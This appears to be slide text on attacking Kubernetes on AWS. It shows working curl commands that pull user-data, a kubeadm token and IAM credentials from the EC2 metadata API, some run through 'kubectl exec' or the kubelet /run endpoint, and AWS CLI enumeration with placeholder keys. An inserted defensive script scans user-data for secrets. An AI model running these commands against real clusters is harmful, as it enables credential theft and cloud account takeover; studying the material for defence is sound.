AWS

Access the Cloud Provider Metadata API Directly

$ curl -s 169.254.169.254/latest/user-data

#!/bin/bash -xe
...
aws s3 --region $REGION cp s3://...
...
kubeadm join --token mykubeadmtoken 10.0.0.1:443

EC2 API: Obtain IAM Credentials

$ curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-worker-iam-policy
{
  "Code" : "Success",
  "LastUpdated" : "2017-12-25T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "MyAccessKeyID",
  "SecretAccessKey" : "MySecretAccessKey",
  "Token" : "MySessionToken",
  "Expiration" : "2017-12-25T04:00:00Z"
}

EC2 API: Use IAM Credentials

# Place credentials in ENV vars
$ export AWS_REGION=us-east-1
$ export AWS_ACCESS_KEY_ID=MyAccessKeyID
$ export AWS_SECRET_ACCESS_KEY=MySecretAccessKey
$ export AWS_SESSION_TOKEN=MySessionToken

# Enumerate instances, get all user-data scripts
$ aws ec2 describe-instances
$ aws ec2 describe-instance-attribute --instance-id i-xxxxxxx --attribute userData
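
Added example (not part of the original page): a defender-side audit for the exposure shown above, where a kubeadm join token sits in user-data that any workload able to reach the metadata API can read. The helper names scan_user_data, sample_user_data and clean_user_data are hypothetical, and both sample scripts are constructed for illustration.

```sh
#!/bin/sh
# Added example: flag secrets embedded in EC2 user-data, which any process
# that can reach 169.254.169.254 (or call DescribeInstanceAttribute) can read.

# scan_user_data (hypothetical helper): reads a decoded user-data script on
# stdin, prints "<line>:<kind>" per finding, returns 0 if any, 1 if clean.
scan_user_data() {
    awk '
        # kubeadm join/init carrying an inline token (--token X or --token=X)
        /kubeadm[ \t]+(join|init)/ && /--token[= \t]+[^ \t]+/ {
            print NR ":kubeadm-token"; found = 1
        }
        # AWS secret key or session token assigned in the script
        /AWS_(SECRET_ACCESS_KEY|SESSION_TOKEN)[ \t]*=/ {
            print NR ":aws-secret"; found = 1
        }
        # PEM private key pasted into the script
        /-----BEGIN [A-Z ]*PRIVATE KEY-----/ {
            print NR ":private-key"; found = 1
        }
        END { exit (found ? 0 : 1) }
    '
}

# Constructed sample modelled on the user-data shown above (the bucket path
# is a placeholder, not from the page).
sample_user_data() {
    cat <<'EOF'
#!/bin/bash -xe
aws s3 --region $REGION cp s3://example-bucket/bootstrap.sh /tmp/bootstrap.sh
kubeadm join --token mykubeadmtoken 10.0.0.1:443
EOF
}

# Constructed clean variant: the join parameters live in a config file.
clean_user_data() {
    cat <<'EOF'
#!/bin/bash -xe
kubeadm join --config /etc/kubeadm/join.yaml
EOF
}

# Demo run on the constructed sample.
sample_user_data | scan_user_data || true
```

To audit a real instance, base64-decode the UserData value returned by the describe-instance-attribute call above and pipe it into scan_user_data.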

EC2 Metadata Master IAM Credentials

Attack Method 2a: "kubectl exec" into a Pod

$ kubectl exec -it etcd-000 -- curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-master-iam-policy
{
  "Code" : "Success",
  "LastUpdated" : "2017-12-25T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "MasterAccessKeyID",
  "SecretAccessKey" : "MasterSecretAccessKey",
  "Token" : "MasterSessionToken",
  "Expiration" : "2017-12-25T04:00:00Z"
}

Attack Method 2b: Kubelet API "run cmd"

$ curl -sk https://10.0.0.1:10250/run/kube-system/etcd-000/etcd-server -d "cmd=curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-master-iam-policy"
{
  "Code" : "Success",
  "LastUpdated" : "2017-12-25T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "MasterAccessKeyID",
  "SecretAccessKey" : "MasterSecretAccessKey",
  "Token" : "MasterSessionToken",
  "Expiration" : "2017-12-25T04:00:00Z"
}